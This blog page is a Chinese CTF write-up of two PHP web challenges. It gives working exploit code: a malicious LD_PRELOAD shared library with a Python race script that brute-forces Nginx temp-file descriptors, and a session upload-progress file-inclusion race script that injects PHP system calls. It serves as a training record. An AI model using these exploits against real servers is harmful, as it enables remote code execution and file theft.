<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>5.4日常 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="[虎符CTF] ezphp之前在buu上做过，但是忘了，正好在nss上再做一遍 开局一段PHP代码 1&lt;?php (empty($_GET[&quot;env&quot;])) ? highlight_file(__FILE__) : putenv($_GET[&quot;env&quot;]) &amp;&amp; system(&amp;#x27;echo hfctf2022&amp;#x27;);?&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="5.4日常">
<meta property="og:url" content="http://ilikeoyt.github.io/project/2023/05/04/5-4%E6%97%A5%E5%B8%B8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="[虎符CTF] ezphp之前在buu上做过，但是忘了，正好在nss上再做一遍 开局一段PHP代码 1&lt;?php (empty($_GET[&quot;env&quot;])) ? highlight_file(__FILE__) : putenv($_GET[&quot;env&quot;]) &amp;&amp; system(&amp;#x27;echo hfctf2022&amp;#x27;);?&amp;">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-05-04T14:57:05.000Z">
<meta property="article:modified_time" content="2023-05-05T02:43:38.461Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/project/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/project/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/project/css/style.css">

  
    
<link rel="stylesheet" href="/project/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/project/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/project/">Home</a>
        
          <a class="main-nav-link" href="/project/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/project/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://ilikeoyt.github.io/project"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-5-4日常" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/project/2023/05/04/5-4%E6%97%A5%E5%B8%B8/" class="article-date">
  <time class="dt-published" datetime="2023-05-04T14:57:05.000Z" itemprop="datePublished">2023-05-04</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      5.4日常
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="虎符CTF-ezphp"><a href="#虎符CTF-ezphp" class="headerlink" title="[虎符CTF] ezphp"></a>[虎符CTF] ezphp</h1><p>之前在buu上做过，但是忘了，正好在nss上再做一遍</p>
<p>开局一段PHP代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> (<span class="keyword">empty</span>(<span class="variable">$_GET</span>[<span class="string">&quot;env&quot;</span>])) ? <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>) : <span class="title function_ invoke__">putenv</span>(<span class="variable">$_GET</span>[<span class="string">&quot;env&quot;</span>]) &amp;&amp; <span class="title function_ invoke__">system</span>(<span class="string">&#x27;echo hfctf2022&#x27;</span>);<span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h4 id="什么是-so文件"><a href="#什么是-so文件" class="headerlink" title="什么是.so文件"></a>什么是.so文件</h4><p>so文件是Linux下的程序函数库,即编译好的可以供其他程序使用的代码和数据。</p>
<p>1、so文件就跟.dll文件差不多。</p>
<p>2、一般来说，so文件就是常说的动态链接库, 都是C或C++编译出来的。与Java比较它通常是用的Class文件(字节码)。</p>
<p>3、Linux下的so文件时不能直接运行的,一般来讲,.so文件称为共享库。</p>
<p>4、so文件使用方法<br>(1)动态库的编译。这里有一个头文件：so_test.h，三个.c文件：test_a.c、test_b.c、test_c.c，我们将这几个文件编译成一个动态库：libtest.so。<br>命令：$ gcc test_a.c test_b.c test_c.c -fPIC -shared -o libtest.so 不用该标志外部程序无法连接。相当于一个可执行文件。</p>
<p>(2)动态库的链接<br>这里有个程序源文件 test.c 与动态库 libtest.so 链接生成执行文件 test：<br>命令：$ gcc test.c -L. -ltest -o test<br>命令：$ ldd test执行test，可以看到它是如何调用动态库中的函数的。</p>
<h4 id="什么是LD-PRELOAD"><a href="#什么是LD-PRELOAD" class="headerlink" title="什么是LD_PRELOAD"></a>什么是LD_PRELOAD</h4><p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/chen_jianjian/article/details/80627693">https://blog.csdn.net/chen_jianjian/article/details/80627693</a><br>LD_PRELOAD是Linux系统的一个环境变量，它可以影响程序的运行时的链接(Runtime linker)，它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数(无需别人的源码)，而另一方面，我们也可以以向别人的程序注入程序，从而达到特定的目的。利用这个点，我们可以优先加载到我们的.so文件</p>
<h4 id="Nginx加载临时文件"><a href="#Nginx加载临时文件" class="headerlink" title="Nginx加载临时文件"></a>Nginx加载临时文件</h4><p>Nginx的临时文件:</p>
<p>当 Nginx 接收来自 FastCGI 的响应时，若大小超过限定值(大概32Kb)不适合以内存的形式来存储的时候，一部分就会以临时文件的方式保存到磁盘上。在 <code>/var/lib/nginx/fastcgi</code> 下产生临时文件。</p>
<p>该文件也会被保存到&#x2F;proc&#x2F;pid&#x2F;id目录下（因为只要进程调用了一个文件，该文件就会被加载到这个目录，即使被删除）</p>
<h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p>先生成一个.c文件，再生成.so文件，在.so文件后添加一些脏数据，让Nginx无法快速响应，从而生成该文件到&#x2F;pro&#x2F;pid&#x2F;id目录，最后利用题目中的参数env，使得LD_PRELOAD&#x3D;&#x2F;proc&#x2F;pid&#x2F;id，加载我们恶意的.so文件</p>
<h4 id="开始"><a href="#开始" class="headerlink" title="开始"></a>开始</h4><p>首先我们生成一个test.c文件</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line">__attribute__ ((__constructor__)) <span class="type">void</span> <span class="title function_">preload</span> <span class="params">(<span class="type">void</span>)</span>&#123;</span><br><span class="line">          unsetenv(<span class="string">&quot;LD_PRELOAD&quot;</span>);<span class="comment">//用于删除设置的的LD_PRELOAD，因为我等会要爆破，每次的LD_PRELOAD是不一样的</span></span><br><span class="line">            system(<span class="string">&quot;id&quot;</span>);</span><br><span class="line">              system(<span class="string">&quot;cat /flag &gt; /var/www/html/flag&quot;</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>生成共享库.so文件</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -shared -fPIC test.c -o exp.so</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">这是一个使用gcc编译器编译生成共享库的命令。具体来说，该命令包含以下参数：</span><br><span class="line"></span><br><span class="line">&quot;-shared&quot;：告诉gcc编译器生成一个共享库，而不是一个可执行文件。</span><br><span class="line">&quot;-fPIC&quot;：告诉gcc编译器生成的代码应该是位置无关的代码（Position Independent Code），这样可以使得共享库可以被加载到任意地址，从而提高共享库的可移植性。</span><br><span class="line">&quot;-o exp.so&quot;：指定生成的共享库的名称和路径，这里假设生成的共享库名为&quot;exp.so&quot;</span><br></pre></td></tr></table></figure>

<p>执行python脚本进行条件竞争加载我们恶意的.so文件</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span>  threading, requests</span><br><span class="line">URL2 = <span class="string">f&#x27;http://node3.anna.nssctf.cn:28419/index.php&#x27;</span></span><br><span class="line">nginx_workers = [<span class="number">12</span>,<span class="number">13</span>,<span class="number">14</span>,<span class="number">15</span>,<span class="number">16</span>,<span class="number">17</span>,<span class="number">18</span>,<span class="number">19</span>,<span class="number">20</span>,<span class="number">21</span>,<span class="number">22</span>,<span class="number">23</span>,<span class="number">24</span>,<span class="number">25</span>,<span class="number">26</span>,<span class="number">27</span>]<span class="comment"># pid爆破列表</span></span><br><span class="line">done = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">uploader</span>():</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;[+] starting uploader&#x27;</span>)</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;exp.so&quot;</span>,<span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data1 = f.read()+<span class="string">b&#x27;0&#x27;</span>*<span class="number">1024</span>*<span class="number">1000</span><span class="comment"># 添加脏数据</span></span><br><span class="line">        <span class="comment">#print(data1)</span></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">not</span> done:</span><br><span class="line">        requests.get(URL2, data=data1)</span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span>):</span><br><span class="line">    t = threading.Thread(target=uploader)</span><br><span class="line">    t.start()</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bruter</span>(<span class="params">pid</span>):</span><br><span class="line">    <span class="keyword">global</span> done</span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">not</span> done:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[+] brute loop restarted: <span class="subst">&#123;pid&#125;</span>&#x27;</span>)</span><br><span class="line">        <span class="keyword">for</span> fd <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>, <span class="number">32</span>):</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                requests.get(URL2, params=&#123;</span><br><span class="line">                    <span class="string">&#x27;env&#x27;</span>: <span class="string">f&quot;LD_PRELOAD=/proc/<span class="subst">&#123;pid&#125;</span>/fd/<span class="subst">&#123;fd&#125;</span>&quot;</span></span><br><span class="line">                &#125;)</span><br><span class="line">            <span class="keyword">except</span>:</span><br><span class="line">                <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> pid <span class="keyword">in</span> nginx_workers:</span><br><span class="line">    a = threading.Thread(target=bruter, args=(pid, ))</span><br><span class="line">    a.start()</span><br></pre></td></tr></table></figure>

<p>访问&#x2F;flag即可</p>
<h1 id="HNCTF-2022-WEEK3-QAQ-1inclu4e"><a href="#HNCTF-2022-WEEK3-QAQ-1inclu4e" class="headerlink" title="[HNCTF 2022 WEEK3]QAQ_1inclu4e"></a>[HNCTF 2022 WEEK3]QAQ_1inclu4e</h1><p>页面一段提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">U LOST STH QAQ!include IT!hint : ZmxhZ+WcqOelnuenmOeahOinkuiQvQ==</span><br></pre></td></tr></table></figure>

<p>flag在隐秘的角落</p>
<p>这题是session文件包含，不得不说脑洞有点大</p>
<p>上脚本</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://node2.anna.nssctf.cn:28243/&#x27;</span></span><br><span class="line">sessid = <span class="string">&#x27;ycx&#x27;</span></span><br><span class="line">data = &#123;<span class="string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span>:<span class="string">&quot;&lt;?php system(&#x27;ls&#x27;);?&gt;)&quot;</span>&#125;</span><br><span class="line">cookie = &#123;<span class="string">&quot;PHPSESSID&quot;</span>:sessid&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upload</span>(<span class="params">session</span>):</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        res = requests.post(url=url,data=data,cookies=cookie,files=&#123;<span class="string">&#x27;file&#x27;</span>:(<span class="string">&#x27;1.txt&#x27;</span>,<span class="number">123</span>)&#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_flag</span>(<span class="params">session</span>):</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        payloadurl = url + <span class="string">&quot;?QAQ=/tmp/sess_&quot;</span> + sessid</span><br><span class="line">        res2 = requests.get(url=payloadurl)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;upload_progress&#x27;</span> <span class="keyword">in</span> res2.text:</span><br><span class="line">            <span class="built_in">print</span>(res2.text)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    session = requests.session()</span><br><span class="line">    t = threading.Thread(target=upload,args=(session,))</span><br><span class="line">    t.start()</span><br><span class="line">    get_flag(session)</span><br></pre></td></tr></table></figure>

<p>最后flag在&#x2F;var&#x2F;ffflllaaagggflag</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://ilikeoyt.github.io/project/2023/05/04/5-4%E6%97%A5%E5%B8%B8/" data-id="clh9yczu1000098ajf1jkaydw" data-title="5.4日常" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/project/2023/05/05/first/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          first
        
      </div>
    </a>
  
  
    <a href="/project/2023/05/04/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/project/archives/2023/05/">May 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/project/2023/05/05/first/">first</a>
          </li>
        
          <li>
            <a href="/project/2023/05/04/5-4%E6%97%A5%E5%B8%B8/">5.4日常</a>
          </li>
        
          <li>
            <a href="/project/2023/05/04/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/project/" class="mobile-nav-link">Home</a>
  
    <a href="/project/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/project/js/jquery-3.4.1.min.js"></script>



  
<script src="/project/fancybox/jquery.fancybox.min.js"></script>




<script src="/project/js/script.js"></script>





  </div>
</body>
</html>